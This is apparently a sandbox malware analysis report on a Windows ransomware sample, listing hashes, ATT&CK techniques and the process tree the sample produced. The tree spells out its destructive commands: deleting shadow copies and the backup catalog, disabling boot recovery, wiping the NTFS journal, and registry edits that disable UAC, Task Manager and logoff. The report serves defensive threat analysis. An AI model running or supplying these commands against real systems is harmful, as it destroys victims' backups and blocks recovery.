abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14

Analysis

max time kernel
127s
max time network
82s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
19-10-2022 18:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
Size

1.1MB
MD5

ad539ebdf9e34e02be487134cf9a6713
SHA1

b5af8a12c5a6ed369debaad7eab59e3cb1715e2d
SHA256

abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14
SHA512

386291d7dd9fa62f7514e784a238bd7a5099a0d2edd8af6085c61e3953a6914faf3dc299f07d56bed3b5b337a18c8b636c84f88693d3bc2512f8dfd51e711492
SSDEEP

24576:g3BzKGHF0bxTCFvXwKt/aISpu4Qc6F3v1HT2BzN2tgGS3YzYhoHWxVGI8WIQbQ:KV4xTCwu4Qc6/F87gIwQ

Score

10^/10

evasion ransomware

Malware Config

Signatures

Deletes NTFS Change Journal 2 TTPs 1 IoCs

The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

ransomware

Inhibit System Recovery

T1490

Data Destruction

T1485

pid	Process
1872	fsutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2100	bcdedit.exe
1576	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3760	wbadmin.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

Enumerates connected drives 3 TTPs 6 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\E:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\F:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\G:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\H:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
File opened (read-only)	\??\I:	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2740	vssadmin.exe
2980	vssadmin.exe
2752	vssadmin.exe
5068	vssadmin.exe
2224	vssadmin.exe
3404	vssadmin.exe
2512	vssadmin.exe
5012	vssadmin.exe
3532	vssadmin.exe
4220	vssadmin.exe
4888	vssadmin.exe
4944	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4484 wrote to memory of 3660	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	79
PID 4484 wrote to memory of 3660	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	79
PID 4484 wrote to memory of 3660	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	79
PID 4484 wrote to memory of 2644	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	80
PID 4484 wrote to memory of 2644	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	80
PID 4484 wrote to memory of 2644	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	80
PID 4484 wrote to memory of 5016	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	81
PID 4484 wrote to memory of 5016	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	81
PID 4484 wrote to memory of 5016	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	81
PID 5016 wrote to memory of 4660	5016	cmd.exe	82
PID 5016 wrote to memory of 4660	5016	cmd.exe	82
PID 5016 wrote to memory of 4660	5016	cmd.exe	82
PID 4484 wrote to memory of 2440	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	83
PID 4484 wrote to memory of 2440	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	83
PID 4484 wrote to memory of 2440	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	83
PID 4484 wrote to memory of 8	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	84
PID 4484 wrote to memory of 8	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	84
PID 4484 wrote to memory of 4128	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	85
PID 4484 wrote to memory of 4128	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	85
PID 4484 wrote to memory of 520	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	89
PID 4484 wrote to memory of 520	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	89
PID 4484 wrote to memory of 924	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	88
PID 4484 wrote to memory of 924	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	88
PID 4484 wrote to memory of 4024	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	93
PID 4484 wrote to memory of 4024	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	93
PID 4484 wrote to memory of 2304	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	92
PID 4484 wrote to memory of 2304	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	92
PID 4128 wrote to memory of 4220	4128	cmd.exe	94
PID 4128 wrote to memory of 4220	4128	cmd.exe	94
PID 4484 wrote to memory of 4764	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	99
PID 4484 wrote to memory of 4764	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	99
PID 4484 wrote to memory of 852	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	98
PID 4484 wrote to memory of 852	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	98
PID 8 wrote to memory of 4888	8	cmd.exe	97
PID 8 wrote to memory of 4888	8	cmd.exe	97
PID 4484 wrote to memory of 1196	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	102
PID 4484 wrote to memory of 1196	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	102
PID 4484 wrote to memory of 1512	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	104
PID 4484 wrote to memory of 1512	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	104
PID 4484 wrote to memory of 3624	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	106
PID 4484 wrote to memory of 3624	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	106
PID 4484 wrote to memory of 3284	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	108
PID 4484 wrote to memory of 3284	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	108
PID 520 wrote to memory of 2980	520	cmd.exe	109
PID 520 wrote to memory of 2980	520	cmd.exe	109
PID 4484 wrote to memory of 3708	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	114
PID 4484 wrote to memory of 3708	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	114
PID 4484 wrote to memory of 3116	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	113
PID 4484 wrote to memory of 3116	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	113
PID 924 wrote to memory of 1576	924	cmd.exe	119
PID 924 wrote to memory of 1576	924	cmd.exe	119
PID 4024 wrote to memory of 2100	4024	cmd.exe	116
PID 4024 wrote to memory of 2100	4024	cmd.exe	116
PID 4484 wrote to memory of 4020	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	121
PID 4484 wrote to memory of 4020	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	121
PID 4484 wrote to memory of 3424	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	120
PID 4484 wrote to memory of 3424	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	120
PID 4484 wrote to memory of 3436	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	126
PID 4484 wrote to memory of 3436	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	126
PID 4484 wrote to memory of 3076	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	125
PID 4484 wrote to memory of 3076	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	125
PID 4764 wrote to memory of 1872	4764	cmd.exe	124
PID 4764 wrote to memory of 1872	4764	cmd.exe	124
PID 4484 wrote to memory of 4512	4484	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	134

C:\Users\Admin\AppData\Local\Temp\abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
"C:\Users\Admin\AppData\Local\Temp\abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe"
1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:3660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off
  2⤵
  PID:2644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 437
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5016
- - C:\Windows\SysWOW64\chcp.com
    chcp 437
    3⤵
    PID:4660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:2440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:8
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4128
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4220
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:520
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
  2⤵
  PID:2304
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5068
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4024
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
  2⤵
  PID:852
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4764
- - C:\Windows\system32\fsutil.exe
    fsutil.exe usn deletejournal /D C:
    3⤵
    - Deletes NTFS Change Journal
    PID:1872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  2⤵
  PID:1196
- - C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:3760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  2⤵
  PID:1512
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  2⤵
  PID:3624
- - C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    3⤵
    PID:4856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  2⤵
  PID:3284
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
  2⤵
  PID:3116
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3404
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:3708
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:1780
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
  2⤵
  PID:3424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:4020
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:3076
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:3604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
  2⤵
  PID:3436
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5012
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:336
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:2956
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
  2⤵
  PID:4400
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4944
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
  2⤵
  PID:4512
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3532
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:4704
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:2496
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:2216
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:1108
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:1816
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
  2⤵
  PID:2852
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2740
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
  2⤵
  PID:1440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
  2⤵
  PID:3492
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:2196
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
  2⤵
  PID:2968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:4572
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:1668
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
  2⤵
  PID:4284

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3812

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3248

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:1604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Data Destruction

T1485

Inhibit System Recovery

T1490

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads